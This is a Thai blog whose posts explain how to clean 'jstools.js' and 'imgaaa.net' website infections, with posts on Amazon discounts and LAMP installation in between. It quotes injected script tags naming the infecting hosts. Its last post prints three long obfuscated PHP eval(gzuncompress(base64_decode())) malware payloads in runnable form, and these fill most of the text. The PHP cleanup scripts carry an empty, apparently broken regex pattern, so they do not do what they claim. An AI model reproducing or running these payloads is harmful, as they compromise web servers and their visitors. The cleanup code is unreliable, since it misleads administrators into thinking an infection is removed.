แก้ Malware jstools.js ฉบับรันบนเว็บ

Written on 2:24 PM by ปั้มเงิน Cookie Run

แก้ Malware jstools.js ฉบับรันบนเว็บ
ไม่มีอะไรมาก แค่ Copy ไปวางในไฟล์ PHP แล้วก็รัน


set_time_limit(600);
echo "-";
define('DS', DIRECTORY_SEPARATOR);
define('BASE_PATH', realpath(dirname(__FILE__)));
flush();
$source = BASE_PATH;
$sourceMain = $source ;
function smartFind($source){
global $sourceMain ;
$dirHandle=opendir($source);
while($file=readdir($dirHandle))
{
flush();
if($file!="." && $file!="..")
{
if(!is_dir($source.DS.$file)){
if( $file == 'index.php' || $file == 'index.html' || $file == 'index.htm' || $file == 'main.php' || $file == 'main.html' || $file == 'main.htm' )
{
$files = $source.DS.$file;
$str = array('@@si');
chmod($files,0777);
$fp = fopen($files, 'r');
$text = @fread($fp, filesize($files));
$text = preg_replace($str, '', $text, -1 , $count);
fclose($fp);
$fp = fopen($files, 'w+');
fwrite($fp, $text);
fclose($fp);
chmod($files,0444);

if($count){
echo $files."
";
++$inum;
$fh = fopen($sourceMain.DS.'log.txt', 'a');
$log = $files." Edit:{$count}\r\n";
fwrite($fh, $log);
fclose($fh);
}
}
} else {
echo $source.DS.$file."
";
smartFind($source.DS.$file);
}
}
}
closedir($dirHandle);
}
smartFind($source);

Malware jstools.js

Written on 11:56 AM by ปั้มเงิน Cookie Run

วันนี้ก็ต้องมานั่งแก้ Malware jstools.js ขยันติดจริง เจ้า Malware jstools.js โดยลักษณะของ Code Malware ตัวนี้คือ
<script src="http://xn--wytrwa-g1a.tarnobrzeg.pl/jstools.js" type="text/javascript">
</script>
<script src="http://xn--niewraliwo-zhb12hem.swidnica.pl/jstools.js" type="text/javascript">
</script>


แล้วก็อื่นอีกหลายตัว แต่ลงท้ายด้วย/jstools.js

OK~ เรามาเริ่มวิธีจัดการมันเลยดีกว่า
ขั้นแรก เราต้องค้าหาไฟล์ที่ติดก่อน ในที่นี้คือไฟล์ indexและ main
find /home -name 'index.php' -or -name 'index.html' -or -name 'index.htm' -or -name 'main.php' -or -name 'main.html' -or -name 'main.htm' -or -name 'default.php' -or -name 'default.html' -or -name 'default.htm' >errors.txt
เนื่องจากผมต้องมานั่งแก้ทั้ง Server วิธีที่ดีที่สุดคือหาไฟล์เหล่านี้มาเก็บไว้ก่อนแล้วค่อย รันคำสั่งแก้ทีเดี่ยว เพราะถ้าไม่ทำแบบนี้มันจะหนัก Server.

ขั้นต่อมา คือเขียนคำสั่งวนลูป อ่านไฟล์ errors.txt หรือ ไฟล์ที่เก็บรายชื่อไฟล์ที่น่าจะติด Malware jstools.js ครับ ในที่นี่ผมเขียนคำสั่ง PHP แก้เอาง่ายดี เหอะๆ.

<?php
$inum = 0;
$files = "/home/errors.txt";
if(file_exists($files))
{
$filelist = file($files);
foreach($filelist as $file)
{
$text = $count = false;
if( trim($file) !== '' ) $file = trim($file);
$str = array('@@si');
chmod($file,0777);
$fp = fopen($file, 'r');
$text = @fread($fp, filesize($file));
$text = preg_replace($str, '', $text, -1 , $count);
fclose($fp);
$fp = fopen($file, 'w+');
fwrite($fp, $text);
fclose($fp);
chmod($file,0444);

if($count){
++$inum;
$fh = fopen('/home/log.txt', 'a');
$log = $file." Edit:{$count}\r\n";
fwrite($fh, $log);
fclose($fh);
echo $inum;
echo $file."\n";
}
}

}
?>


แค่นี้ละจบกันทีกับ Malware jstools.js

Found It! Amazon.com Discount List

Written on 12:13 PM by ปั้มเงิน Cookie Run

Found It! Amazon.com Discount List
Apparel: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Automotive: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Baby: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Beauty: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Books: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Books (Kindle): 90% 80% 70% 60% 50% 40% 30% 20% 10%
Camera & Photo: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Cell Phones: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Cell Phone Accessories: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Computer Hardware: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Computer Software: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Electronics: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Gourmet Food: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Grocery: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Health & Personal Care: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Home & Garden: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Home Improvement: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Industrial & Scientific: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Jewelry: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Kitchen & Dining: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Magazine Subscriptions: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Miscellaneous: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Music: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Musical Instruments: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Office Products: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Outdoor Living: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Pet Supplies: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Sporting Goods: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Toys & Games: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Video (DVD): 90% 80% 70% 60% 50% 40% 30% 20% 10%
Video (VHS): 90% 80% 70% 60% 50% 40% 30% 20% 10%
Video Games: 90% 80% 70% 60% 50% 40% 30% 20% 10%
Watches: 90% 80% 70% 60% 50% 40% 30% 20% 10%

ติดตั้ง LAMP บน CentOS 5.5 64Bit

Written on 12:25 AM by ปั้มเงิน Cookie Run

ติดตั้ง LAMP บน CentOS 5.5 64Bit
จากการไปทำระบบให้ DD X-prezz เป็นเหตุให้ต้องติดตั้ง WebServer โดยไม่ได้ใช้ DirectAdmin ที่ซื้อมาในราคา $299 เพราะยืนยันระหว่างการติดตั้งไม่ได้ โดยวิธีการติดตั้งในครั้งนี้มีดังนี้คือ

1. ปรับปรุงแพกเกจที่มีอยู่ในระบบให้เป็นแพกเกจใหม่ ด้วยคำสั่ง
#yum update
2. ติดตั้งแพกเกจอื่นที่จำเป็น
#yum install wget bzip2 unzip zip openssl gcc gcc-c++
3. ติดตั้ง MySQL เพื่อจะเป็น Database Server
#yum install mysql mysql-devel mysql-server
3.1. เพื่อให้ MySQL เริ่มทำงานโดยอัตโนมัติเมื่อใดก็ตามที่บูทระบบ พิมพ์คำสั่งดังนี้
#chkconfig mysqld on
3.2. สั่งให้ MySQL เริ่มทำงานด้วยคำสั่ง
#/etc/init.d/mysqld start
หรือ สามารถพิมพ์คำสั่งสั้นๆ ได้ โดยใช้คำสั่งนี้
#service mysqld start

3.3. ตรวจสอบว่า MySQL ที่ติดตั้ง เริ่มทำงานตามที่สั่งเมื่อสักครูแล้วหรือเปล่า ด้วยคำสั่ง
#netstat -tap
จะปรากฏโปรแกรมที่สำงานอยู่ในโปรโตคอลต่างๆ ให้ดูที่โปรโตคอล TCP จะปรากฏ MySQL แบบนี้
tcp 0 0 *:mysql *:* LISTEN
2492/mysqld
แสดงว่า MySQL ทำงานแล้ว

3.4. กำหนดรหัสผ่านสำหรับ root ของ MySQL ในการเข้าใช้ฐานข้อมูล ด้วยคำสั่ง
#mysqladmin -u root password รหัส

4. ติดตั้ง Apache ด้วย PHP ด้วยคำสัง ดังนี้
#yum install php php-gd php-imap php-mysql php-ldap php-odbc php-pear php-xml php-xmlrpc curl perl-libwww-perl libxml2 php-mbstring php-mcrypt
4.1. แก้ไขไฟล์คอนฟิกสำหรับ Apache (httpd) ได้ที่ /etc/httpd/conf/httpd.conf
#vi /etc/httpd/conf/httpd.conf
4.2. สั่งให้ Apache (httpd) ทำงานทุกๆ ที่มีการบูตระบบใหม่ ด้วยคำสั่ง
#chkconfig httpd on
4.3. สั่งให้ Apache (httpd) เริ่มทำงานด้วยคำสั่ง
#/etc/init.d/httpd start
หรือ
#service https start

DocumentRoot หรือ ที่ๆ ใช้เก็บไฟล์ html หรือไฟล์สคริปต์ต่างๆ ที่จะแสดงผลเมื่อเรียกผ่านทางบราวเซอร์จะเก็บอยู่ที่ /var/www/html
4.4. ปรับแต่งไฟล์คอนฟิกของ apache ที่ /etc/httpd/conf/httpd.conf เพื่อเปลี่ยนค่า DirectoryIndex ดังนี้
DirectoryIndex index.html index.htm index.shtml index.cgi index.php index.php3 index.pl
4.5. จากนั้นบันทึกการแก้ไข แล้วออกมา แล้ว Restart Apache ด้วยคำสั่ง
#/etc/init.d/httpd restart
4.6. ทดสอบว่า Apache Web Server ทำงานแล้วหรือยัง โดยการทดสอบเปิดบราวเซอร์ขึ้นมา แล้วใส่ IP Address ของเครื่องลงไป (หากได้รับ IP Address จาก DHCP Server ซึ่งจะไม่ทราบ IP Address ของเครื่อง ใช้คำสั่ง #ifconfig เพื่อตรวจดู IP Address)
** หากบราวเซอร์ไม่ปรากฏหน้าจอดังภาพ หรือเรียก IP Address แล้วไม่ขึ้นดังภาพ ให้แก้ไขการอนุญาตของ Firewall
4.7. หากเว็บไม่รัน หรือ เว็บของ User ไม่ทำงานให้เรียกคำสั่ง

sudo setsebool -P httpd_read_user_content 1+
sudo setsebool -P ftp_home_dir=1
ถ้าต้องการทราบว่าแต่ละค่ากำหนดอะไรไว้ ก็ใช้ #




วิธีแก้ Malware imgaaa.net ทั้ง Host แบบ Bash Shell

Written on 2:05 PM by ปั้มเงิน Cookie Run

วิธีแก้ Malware imgaaa.net ทั้ง Host แบบ Bash Shell

หลังจาก SV. ที่ทำงานติดไอเจ้า imgaaa.net ทุกโดเมน ก็ทำให้กลายเป็นปัญหาใหญ่ที่จะแแก้ไขได้ด้วยมือเปล่าเลยมานั้นเขียน Bash Shell ขึ้นมาใช้ซะเลย โดยหลักการทำงานไม่ยุ่งยากเท่าไร คือ
1. ให้ค้นหาไฟล์ทุกไฟล์ใน Directories /home/ ทั้งหมด ทุก directories ที่มีข้อความว่า imgaaa.net
2. แสดงผลออกทางหน้าจอ จะได้รู้ด้วยว่าเจอไฟล์อะไรบ้าง
3. ขั้นตอนสำคัญเลยคือ cat $file สั่งให้เปิดไฟล์ที่เจอ แล้ว grep -v "imgaaa.net" แสดงผลโดยละเว้นหรือไม่ให้แดงบรรทัดที่มีคำว่า imgaaa.net เสร็จแล้วให้ทำการสร้างไฟล์ใหม่ขึ้นมา > $file.new; โดยลบบรรทัดนั้นออกไปแล้ว ต่อไปให้ทำการคัดลอก cp -a $file.new $file; ไฟล์ที่ลบข้อความดังกล่าวไปแล้วทับไฟล์เดิมที่ติด Malware imgaaa.net สุดท้ายลบ rm -f $file.new; ไฟล์ที่ทำสำเนาตัวที่ลบข้อความ Malware imgaaa.net เมื่อตอนแรกทิ้ง

#!/bin/bash
for file in $(grep -lr imgaaa.net /home/*)
do
echo "${file}";
cat $file | grep -v "imgaaa.net" > $file.new; cp -a $file.new $file; rm -f $file.new;
done


หุๆๆ สบายไหมล่ะ แต่ขอบอกว่ารันนานมากครับ และก็ไม่มีอะไรขึ้นเลยจนกว่าจะรันเสร็จ ก็ประมาณ 1-2 ชั่วโมงล่ะ ขึ้นอยู่กับ Host ว่ามีเว็บหรือไฟล์มากน้อยแค่ไหน

ไฟล์ Bash Shell ที่ผมสร้างผมตั้งชื่อว่า imgaaa.net.sh แล้วพอเวลารันผมใช้ sh imgaaa.net.sh หรือแล้วแต่ ตระกูลของ ยูนิกซ์ ด้วยล่ะ

ตัวอย่าง Code Malware imgaaa.net

Written on 10:24 AM by ปั้มเงิน Cookie Run

ตัวอย่าง Code Malware imgaaa.net

โดยตัว Code จะถูกเข้ารหัสด้วย base64encoded โดยตอนที่มันถูกเรียกทำงานมันจะทำการถอดรหัส แล้วใช้คำสั่ง eval และ gzuncompress เพื่อให้สามารถรันตัว Code ที่ถูกเข้ารหัสได้ โดย Code ของไฟล์ Malware imgaaa.net มีดังที่แสดงด้านล่าง

<? eval(gzuncompress(base64_decode('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'))); ?>
<? eval(gzuncompress(base64_decode('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'))); ?>
<? eval(gzuncompress(base64_decode('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